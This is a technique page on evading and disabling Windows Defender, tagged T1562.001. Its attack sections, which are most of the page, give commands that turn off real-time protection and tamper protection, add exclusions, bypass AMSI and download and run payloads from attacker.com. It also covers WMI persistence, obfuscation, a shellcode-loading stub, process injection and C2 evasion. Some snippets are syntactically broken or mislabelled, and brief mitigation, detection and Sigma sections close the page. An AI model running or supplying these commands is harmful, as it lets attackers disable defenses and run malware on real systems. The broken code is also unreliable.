High Severity | T1562.001
🛡️ Windows Defender Evasion
🧠 Description
Windows Defender (Microsoft Defender Antivirus) is an integrated anti-malware solution that uses signatures, heuristics, and machine learning to detect threats. Evasion techniques exploit blind spots in real-time protection, signature gaps, and configuration weaknesses to run malicious code undetected.
Detection Methods to Bypass:
- Real-time Protection: Behavior monitoring, script protection
- Cloud-Delivered Protection: Rapid signature updates from cloud
- Heuristic Analysis: Suspicious API patterns, process behavior
- AMSI: Anti-Malware Scan Interface for script inspection
- Behavior Monitoring: Parent-child process relationships
💣 Disabling/Modifying Defender
1. Disable Real-Time Protection:
# PowerShell - Disable real-time monitoring Set-MpPreference -DisableRealtimeMonitoring $true # Disable behavior monitoring Set-MpPreference -DisableBehaviorMonitoring $true # Disable script scanning Set-MpPreference -DisableScriptScanning $true # Disable cloud-delivered protection Set-MpPreference -DisableCloudBlock $true # Disable sample submission Set-MpPreference -SubmitSamplesConsent NeverSend
2. Tamper Protection Bypass:
# Check if tamper protection is enabled Get-MpComputerStatus | Select-Object TamperProtection # If disabled via Group Policy, can disable via registry REG ADD "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f # Or via WDigest modification (requires elevation) REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f # Wait and restart Defender sc start WinDefend
3. Exclusions (Persistence):
# Add folder exclusion Add-MpPreference -ExclusionPath "C:\Tools" # Add process exclusion Add-MpPreference -ExclusionProcess "powershell.exe" # Add extension exclusion Add-MpPreference -ExclusionExtension ".txt" # Verify exclusions Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess
🔓 AMSI Bypass
AMSI Bypass Techniques:
# Patch AmsiScanBuffer (PowerShell)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Alternative - patch after load
# Use reflection to access internal types
# Python AMSI bypass
# Hook AmsiScanBuffer to return AMSI_RESULT_CLEAN
Evade PowerShell Script Scanning:
# Base64 encode your script
$script = @"
Write-Host "Evil payload"
"@
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
powershell -enc $encoded
# Use compression
$compressed = [System.IO.Compression.GZipStream]::new([System.IO.MemoryStream]::new([Convert]::FromBase64String($data)),[System.IO.Compression.CompressionMode]::Decompress)
# XOR obfuscation
$key = 0x42
foreach ($byte in [System.Text.Encoding]::ASCII.GetBytes($script)) {
[byte]($byte -bxor $key)
}
📄 Fileless Evasion
1. Memory-Only Execution:
# Download and execute in memory
IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")
# Using Invoke-Expression
$url = "http://attacker.com/evil.exe"
$bytes = (New-Object Net.WebClient).DownloadData($url)
$process = [System.Reflection.Assembly]::Load($bytes)
$process.EntryPoint.Invoke($null, $null)
# Bypass by not writing to disk
2. WMI Event Subscription (Persistence):
# Create permanent WMI event
$filter = @"Namespace: root\subscription
Class: __EventFilter
Name: EvilFilter
EventNamespace: root\cimv2
QueryLanguage: WQL
Query: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'
"@
# PowerShell one-liner for execution
$payload = 'powershell -enc JABjAGwAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAIgBoAHQAdABwADoALwAvAHMAYQBuAGMAaQBuAGUALgB0AGUALgBhAHQAawBvAC4AYwBvAG0AIgAgAC0ATgBvAHIAaQAgAHsAIABpAGYAKAAkAHsAIABjAGEAdABjAGEAdABjAGEAYwAgAC0ARgBvAHIAYwBhAGwAIAAkAHsAIABiAGEAdABjAHMAIAB9ACkAIAB9AA=='
Register-WmiEvent -Namespace "root\subscription" -Name "EvilTask" -ScriptBlock { Invoke-Expression $payload }
3. Registry-Based Execution:
# Run key for persistence (no AV bypass, but good for persistence) REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /d "powershell -enc ..." # Registry autorun location HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Run
🎭 Obfuscation Techniques
1. String Obfuscation:
# Split strings
$com = "Comp" + "uter"
$man = "Manage" + "ment"
# Use CHAR array
$cmd = [char]69 + [char]86 + [char]73 + [char]76
# Variable expansion
${env:ProgramFiles(x86)} = "C:\Windows"
${Path} = "path"
Invoke-Expression "$env:SystemRoot\System32\cmd.exe"
2. Command Obfuscation:
# Space injection cmd.exe /c whoami cmd.exe /c" "whoami cmd.exe /c who;ami # Caret substitution cmd.exe /c who^ami # Quotes cmd.exe /c "whoami" # Variable expansion %:~0,4%%:~8,4% = cmd.exe (using substring expansion)
3. Compiled Payloads:
# Compile C# inline with PowerShell
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Evil {
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
# Compile VB.NET or C# to .exe
# Use Donut for shellcode conversion
donut -i payload.bin -o output.exe
💉 Process Injection
Classic Injection Techniques:
# VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
# Target legitimate process (e.g., notepad.exe)
# PowerShell implementation
$process = Get-Process notepad
$address = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
(GetProcAddress ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((GetProcAddress ([System.Runtime.InteropServices.Marshal]::LoadLibrary("kernel32.dll")),"VirtualAllocEx").Invoke($null,[IntPtr]::Zero,0x1000,0x3000,0x40)))),
(New-Object System.Runtime.InteropServices.Marshal).Copy($shellcode, 0, [IntPtr]::Add($process.Handle, $address), $shellcode.Length)
# Use CSK or SharpC2 for automated injection
Process Hollowing (RunPE):
# Spawn legit process in suspended state # Unmap its memory # Write malicious image # Resume thread # Tools like donut, sRDI make this easier
🌐 Network Evasion
Beacon Communication:
# HTTPS C2 (certificate validation can be bypassed) # Use legitimate sites for C2 (Twitter, GitHub) # Domain fronting (use CDN) # Connect to legitimate domain, but Host header points to C2 # DNS C2 (long polling, small responses) # Use DGA (Domain Generation Algorithm) # Encrypted channels # Use TLS 1.3, certificate pinning
Web Traffic Mimicry:
# Look like normal browser traffic # Use User-Agent of popular browsers # Mimic request patterns (GET /style.css, etc.) # Add common headers (Accept, Accept-Language)
🛡️ Mitigation
✅ Defender Hardening:
- Enable Tamper Protection: Prevent Defender modification
- Enable Cloud-Delivered Protection: Rapid threat response
- Enable Attack Surface Reduction: ASR rules block common techniques
- Deploy EDR: Defender + Sentinel/Defender for Endpoint
- Disable PowerShell v2: Remove legacy scripting
- Monitor Script Execution: ASR rules for PowerShell
🔍 Detection
Sysmon Event Monitoring:
# Monitor PowerShell script block logs # Event ID 4104 - Script Block Logging # Monitor AMSI bypass attempts # Event ID 1102 - Log cleared # Monitor Defender modification # Check for "MpPreference" modification # Use Hunting query in MDE DeviceRegistryEvents | where RegistryKey contains "MpPreference" | where ActionType == "RegistryValueModified"
Sigma Rules:
title: Disable Windows Defender
id: disable-defender
detection:
selection:
EventID: 1
CommandLine|contains:
- 'Set-MpPreference'
- 'DisableRealtimeMonitoring'
- 'MpPreference'
condition: selection
level: critical
🛠️ Tools
- Donut: Shellcode to EXE/DLL converter
- Unicorn: PowerShell downgrade and delivery
- Meta Twin: Embed payloads in legit binaries
- SharpC2/Brute Ratel: C2 frameworks with evasion
- Invoke-Obfuscation: PowerShell obfuscation framework